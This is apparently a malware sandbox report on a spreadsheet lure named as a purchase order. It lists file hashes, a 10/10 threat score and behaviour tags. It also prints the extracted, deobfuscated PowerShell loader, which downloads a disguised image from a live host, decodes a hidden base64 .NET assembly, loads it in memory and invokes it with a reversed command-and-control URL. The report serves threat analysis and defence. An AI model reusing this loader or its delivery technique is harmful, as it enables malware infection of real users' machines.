General

  • Target

    PO-674394.xlam.xlsx

  • Size

    642KB

  • Sample

    231011-hggxpsfe8z

  • MD5

    66013791a9a70b8b6429a842ee029ccd

  • SHA1

    a8c5aaf7a3f794bda85717f264a65075c80a10a1

  • SHA256

    ad6dabfbf9b343f2a04f6cdfbc34411b378212dea73d669cab262564420d6ecb

  • SHA512

    9935eb3e66ccf49d3342c88324c6f838239e68d7e28010b1cb4b73b4db0351d200fdfec67a6d2ee53b14b6e9812b5eefcd004a9ea46bc3f99fd96abea206520f

  • SSDEEP

    12288:Kqs/irVm8pm8UKkayx+Uu1oNR4rdCTflYmWu4K+7ZGGnaZZg9xQ9ar6MnDwI:Bqyg8rovs6WC7Su4K+7OZSnUHMnDl

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
1
$imageurl = "https://uploaddeimagens.com.br/images/004/616/609/original/rump_vbs.jpg?1695408937"
2
$webclient = new-object system.net.webclient
3
$imagebytes = $webclient.downloaddata("https://uploaddeimagens.com.br/images/004/616/609/original/rump_vbs.jpg?1695408937")
4
$imagetext = ([system.text.encoding]::ascii).getstring($imagebytes)
5
$startflag = "<<BASE64_START>>"
6
$endflag = "<<BASE64_END>>"
7
$startindex = $imagetext.indexof("<<BASE64_START>>")
8
$endindex = $imagetext.indexof("<<BASE64_END>>")
9
$startindex -ge 0 -and $endindex -gt $startindex
10
$startindex = $startflag.length
11
$base64length = $endindex - $startindex
12
$base64command = $imagetext.substring($startindex, $base64length)
13
$commandbytes = [system.convert]::frombase64string($base64command)
14
$loadedassembly = [system.reflection.assembly]::load($commandbytes)
15
$type = $loadedassembly.gettype("Fiber.Home")
16
$method = ($type.getmethod("VAI")).invoke($null, [object[]]"txt.smhogn/25.84.011.97//:ptth", "dfdfd", "dfdf", "dfdf", "dadsa", "de", "cu")
17
URLs
ps1.dropper

https://uploaddeimagens.com.br/images/004/616/609/original/rump_vbs.jpg?1695408937

exe.dropper

https://uploaddeimagens.com.br/images/004/616/609/original/rump_vbs.jpg?1695408937

Targets

    • Target

      PO-674394.xlam.xlsx

    • Size

      642KB

    • MD5

      66013791a9a70b8b6429a842ee029ccd

    • SHA1

      a8c5aaf7a3f794bda85717f264a65075c80a10a1

    • SHA256

      ad6dabfbf9b343f2a04f6cdfbc34411b378212dea73d669cab262564420d6ecb

    • SHA512

      9935eb3e66ccf49d3342c88324c6f838239e68d7e28010b1cb4b73b4db0351d200fdfec67a6d2ee53b14b6e9812b5eefcd004a9ea46bc3f99fd96abea206520f

    • SSDEEP

      12288:Kqs/irVm8pm8UKkayx+Uu1oNR4rdCTflYmWu4K+7ZGGnaZZg9xQ9ar6MnDwI:Bqyg8rovs6WC7Su4K+7OZSnUHMnDl

    Score
    10/10
    • Blocklisted process makes network request

    • Drops file in System32 directory

MITRE ATT&CK Enterprise v15

Tasks

We care about your privacy.

This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.